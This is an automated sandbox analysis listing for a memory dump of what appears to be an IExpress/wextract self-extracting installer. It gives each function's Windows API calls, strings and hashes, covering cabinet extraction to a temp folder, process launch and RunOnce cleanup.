Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID: wb
API String ID: 4237285672-1758207633
Opcode ID: c97f6f580533bb5e0d663d760fce2e8eee122bb592229d864c05a84fbd528780
Instruction ID: bbaf2306a74d86bd6e4e9eda6800705c4055b9e7e504885a13831da787e56f24
Opcode Fuzzy Hash: c97f6f580533bb5e0d663d760fce2e8eee122bb592229d864c05a84fbd528780
Instruction Fuzzy Hash: D771A2B290121CAFEB159B65DC85FFB77ACEB48344F1451ABF445F6240DA309F8A8B20

Uniqueness

Uniqueness Score: -1.00%

Function 00ED4FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00ED468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00ED46A0
Part of subcall function 00ED468F: SizeofResource.KERNEL32(00000000,00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46A9
Part of subcall function 00ED468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00ED46C3
Part of subcall function 00ED468F: LoadResource.KERNEL32(00000000,00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46CC
Part of subcall function 00ED468F: LockResource.KERNEL32(00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46D3
Part of subcall function 00ED468F: memcpy_s.MSVCRT ref: 00ED46E5
Part of subcall function 00ED468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00ED4FFE
LoadResource.KERNEL32(00000000,00000000), ref: 00ED5006
LockResource.KERNEL32(00000000), ref: 00ED500D
GetDlgItem.USER32(00000000,00000842), ref: 00ED5030
ShowWindow.USER32(00000000), ref: 00ED5037
GetDlgItem.USER32(00000841,00000005), ref: 00ED504A
ShowWindow.USER32(00000000), ref: 00ED5051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00ED5111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00ED5159

Strings

CABINET, xrefs: 00ED4FE6, 00ED4FF7
*MEMCAB, xrefs: 00ED50C7

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: c825065b1f9609c22785974435668164f03198da774492aeb7721259a49043fe
Instruction ID: 3e2a73255dc02398908c0748b6c9749520adfcafaba9eaa867933b4144f15111
Opcode Fuzzy Hash: c825065b1f9609c22785974435668164f03198da774492aeb7721259a49043fe
Instruction Fuzzy Hash: E131B3B16437127FE7205B63BD8AF6737ACE758749F082027B901B63E1DBB58C468650

Uniqueness

Uniqueness Score: -1.00%

Function 00ED53A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00ED171E: _vsnprintf.MSVCRT ref: 00ED1750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED53FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED5402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED5434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED5452

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00ED53B7, 00ED53E1, 00ED541E
IXP, xrefs: 00ED5419
IXP%03d.TMP, xrefs: 00ED53C0

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-7194216
Opcode ID: fa82bc608177abb04add2c1c3456b7c8ead46e4f2d61c64655521548c1b215bf
Instruction ID: b14b19a5a1373f73867117718934fe4cdfc3c27d99c81366c7a83ffaac1f8a24
Opcode Fuzzy Hash: fa82bc608177abb04add2c1c3456b7c8ead46e4f2d61c64655521548c1b215bf
Instruction Fuzzy Hash: DA11E6723026047BD3109B26AC49FAF775DDFC5311F042067B556F2290CE748A878662

Uniqueness

Uniqueness Score: -1.00%

Function 00ED5467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED54C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED556F

Part of subcall function 00ED53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED53FB
Part of subcall function 00ED53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED5402
Part of subcall function 00ED53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED541F
Part of subcall function 00ED53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED542B
Part of subcall function 00ED53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED5434

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00ED547D, 00ED5481, 00ED54AB, 00ED551C, 00ED553C, 00ED5568
ppc, xrefs: 00ED54E9
i386, xrefs: 00ED54FE
alpha, xrefs: 00ED54F0
mips, xrefs: 00ED54F7

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-3696344869
Opcode ID: 71f6f4ed0271ce20f6154c5c12603a5d67186a3d4887dadec7e980fe12bc7a3e
Instruction ID: 2ff74180c4e66b4b2327c5f82020cc371ec3eaf1e511617b997822789c5f0d16
Opcode Fuzzy Hash: 71f6f4ed0271ce20f6154c5c12603a5d67186a3d4887dadec7e980fe12bc7a3e
Instruction Fuzzy Hash: D8310372B01B11AFCB119B6ABD45ABE779BEB81344B04216BA402B6391DA70CE478691

Uniqueness

Uniqueness Score: -1.00%

Function 00ED256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00ED4096,00ED4096,?,00ED1ED3,00000001,00000000,?,?,00ED4137,?), ref: 00ED25B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00ED4096,?,00ED1ED3,00000001,00000000,?,?,00ED4137,?,00ED4096), ref: 00ED25CB
RegCloseKey.KERNELBASE(?,?,00ED1ED3,00000001,00000000,?,?,00ED4137,?,00ED4096), ref: 00ED25DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00ED4096,00ED4096,?,00ED1ED3,00000001,00000000,?,?,00ED4137,?), ref: 00ED25FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00ED4096,00000000,00000000,00000000,00000000,?,00ED1ED3,00000001,00000000), ref: 00ED261A

Strings

System\CurrentControlSet\Control\Session Manager, xrefs: 00ED25A8
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00ED25F5
PendingFileRenameOperations, xrefs: 00ED25C3

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: 354284dc6fee9d599d33b9cba900406f538fac8542a179c71895b72156365a9b
Instruction ID: 30f4f455e9ef30b00bd8ca0f2662d10a60ce25924e2de8bf643be78b2bf328f8
Opcode Fuzzy Hash: 354284dc6fee9d599d33b9cba900406f538fac8542a179c71895b72156365a9b
Instruction Fuzzy Hash: B8118935902228BFDB209B929D09DFF7F7CDF11795F145057B908B2100D6304F49D6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00ED6A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00ED7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00ED7182
Part of subcall function 00ED7155: GetCurrentProcessId.KERNEL32 ref: 00ED7191
Part of subcall function 00ED7155: GetCurrentThreadId.KERNEL32 ref: 00ED719A
Part of subcall function 00ED7155: GetTickCount.KERNEL32 ref: 00ED71A3
Part of subcall function 00ED7155: QueryPerformanceCounter.KERNEL32(?), ref: 00ED71B8

GetStartupInfoW.KERNEL32(?,00ED72B8,00000058), ref: 00ED6A7F
Sleep.KERNEL32(000003E8), ref: 00ED6AB4
_amsg_exit.MSVCRT ref: 00ED6AC9
_initterm.MSVCRT ref: 00ED6B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 00ED6B49
exit.KERNELBASE ref: 00ED6BBF
_ismbblead.MSVCRT ref: 00ED6BDA

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 135bb4e86af85036f7d0941d55f9d9b2b8f062faf7e14e05a9d8398a8019e1e6
Instruction ID: 629b869fc971dcbb34fd1e92f9671ef99889dcd4f96808c47d0e585a1337fe12
Opcode Fuzzy Hash: 135bb4e86af85036f7d0941d55f9d9b2b8f062faf7e14e05a9d8398a8019e1e6
Instruction Fuzzy Hash: 224123349063649FDB21AB6AED057AE77E0EB44724F54212BE881F73A0DB704D4BCB80

Uniqueness

Uniqueness Score: -1.00%

Function 00ED58C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00ED5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED58E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00ED5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED5943
LocalFree.KERNEL32(00000000,?,00ED5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED594D
CloseHandle.KERNEL32(00000000,?,00ED5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00ED5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00ED5963

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00ED58CD, 00ED58CF, 00ED5919, 00ED5962
TMP4351$.TMP, xrefs: 00ED5923

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
API String ID: 747627703-394614654
Opcode ID: 1ed52e4a283091de99b6bca3832d83dfae3a03f9b309f8c73bf2c35c1a5e1198
Instruction ID: 11b5d31715aaec8dbfcef3a7c594f44622add817ea070a19801ccc735359c40e
Opcode Fuzzy Hash: 1ed52e4a283091de99b6bca3832d83dfae3a03f9b309f8c73bf2c35c1a5e1198
Instruction Fuzzy Hash: F11126726022206BC7241F7AAC0DA9B7F99DF86364B141627B525F33D1CA70880B82A0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED3FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00ED4033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00ED4049
GetExitCodeProcess.KERNELBASE(?,?), ref: 00ED405C
CloseHandle.KERNEL32(?), ref: 00ED409C
CloseHandle.KERNEL32(?), ref: 00ED40A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00ED40DC
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00ED40E9

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: fdbab4d2fb396ec2d58a148e992fc2951170d8bd5fede903a54ea7a6b675b87c
Instruction ID: e6ecf40a90655a7f780fe709e90a1615ee896e4326c8dcc3243e4db1a2c2f891
Opcode Fuzzy Hash: fdbab4d2fb396ec2d58a148e992fc2951170d8bd5fede903a54ea7a6b675b87c
Instruction Fuzzy Hash: 7431B6B1642218AFEB209F66EC49FAB777CEBA4704F14116BF545F62A1C6304D8ACB11

Uniqueness

Uniqueness Score: -1.00%

Function 00ED51E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00ED46A0
Part of subcall function 00ED468F: SizeofResource.KERNEL32(00000000,00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46A9
Part of subcall function 00ED468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00ED46C3
Part of subcall function 00ED468F: LoadResource.KERNEL32(00000000,00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46CC
Part of subcall function 00ED468F: LockResource.KERNEL32(00000000,?,00ED2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46D3
Part of subcall function 00ED468F: memcpy_s.MSVCRT ref: 00ED46E5
Part of subcall function 00ED468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00ED46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00ED2F4D,?,00000002,00000000), ref: 00ED5201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00ED5250

Part of subcall function 00ED44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00ED4518
Part of subcall function 00ED44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 00ED4554

Part of subcall function 00ED6285: GetLastError.KERNEL32(00ED5BBC), ref: 00ED6285

Strings

UPROMPT, xrefs: 00ED51EF, 00ED5230
<None>, xrefs: 00ED5262

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: d8e7b541b1844a98de4942045e2ad41305d16baafdf89a5356506cb86ff522e9
Instruction ID: 9d2fb499898d3cd4a658607b249e12910096fc69328523a8618de35c05d38ea8
Opcode Fuzzy Hash: d8e7b541b1844a98de4942045e2ad41305d16baafdf89a5356506cb86ff522e9
Instruction Fuzzy Hash: AE11B6B22026017FD3146BB26D46B3B62EDDBD9354B15543BB642F53E1DA798C074124

Uniqueness

Uniqueness Score: -1.00%

Function 00ED52B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(006D4618,00000080,?,00000000), ref: 00ED52F2
DeleteFileA.KERNELBASE(006D4618), ref: 00ED52FA
LocalFree.KERNEL32(006D4618,?,00000000), ref: 00ED5305
LocalFree.KERNEL32(006D4618), ref: 00ED530C
SetCurrentDirectoryA.KERNELBASE(00ED11FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00ED5363

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00ED5334

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 2833751637-1610346413
Opcode ID: 6ccee4a4b77d41164cedea1e2ee5a2102ffffd211e2f7df627607422eefe6cdb
Instruction ID: 7a264514b9decd77c787015719a4bd8f82463e719332384b74fe8342a80f286b
Opcode Fuzzy Hash: 6ccee4a4b77d41164cedea1e2ee5a2102ffffd211e2f7df627607422eefe6cdb
Instruction Fuzzy Hash: C921AE32512614DFDB249F26FE09B6977B0EB10758F08216BE842763A5CFB05D8ECB80

Uniqueness

Uniqueness Score: -1.00%

Function 00ED1FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00ED538C,?,?,00ED538C), ref: 00ED2005
RegDeleteValueA.KERNELBASE(00ED538C,wextract_cleanup2,?,?,00ED538C), ref: 00ED2017
RegCloseKey.KERNELBASE(00ED538C,?,?,00ED538C), ref: 00ED2020

Strings

wextract_cleanup2, xrefs: 00ED1FE7, 00ED200F
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00ED1FFB

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
API String ID: 849931509-3354236729
Opcode ID: f4278db7ea2aca61c20d7f515165d800265dfeb9e4baf22496a7ad4be24a4361
Instruction ID: 5c9032865404fcaf0bb959edc3728d3b9c7e9b7dbc132fadc0390e1313ea7893
Opcode Fuzzy Hash: f4278db7ea2aca61c20d7f515165d800265dfeb9e4baf22496a7ad4be24a4361
Instruction Fuzzy Hash: 8AE08630551318BFE7218F92FE0AF597B2AFB10744F1402ABFA04B0160EB715F19D605

Uniqueness

Uniqueness Score: -1.00%

Function 00ED4CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00ED4DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00ED4DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00ED4D36, 00ED4DE3

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667872544.0000000000ED8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1667897236.0000000000EDC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ed0000_Tg9kb35.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 3625706803-1610346413
Opcode ID: 927c245f497a55ae28f5babe42b28567efa5942a145d16cdfa63cb522f5c8f21
Instruction ID: 34666ac8fb48b3915d21aee93848a99183c6f8f396d988ff01c0380950299881
Opcode Fuzzy Hash: 927c245f497a55ae28f5babe42b28567efa5942a145d16cdfa63cb522f5c8f21
Instruction Fuzzy Hash: FC4116B62001019BCB329F38DD446F973A6EB65308B046A6BD886BB3C5DA31DE4BC750

Uniqueness

Uniqueness Score: -1.00%

Function 00ED4AD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00ED369F
Part of subcall function 00ED3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED36B2
Part of subcall function 00ED3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED36DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00ED4B05

Strings

ppS, xrefs: 00ED4B1C, 00ED4B2A

Memory Dump Source

Source File: 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000002.00000002.1667838949.0000000000ED0000.00000002.00000001.01000000.00000005.sdmpDownload File
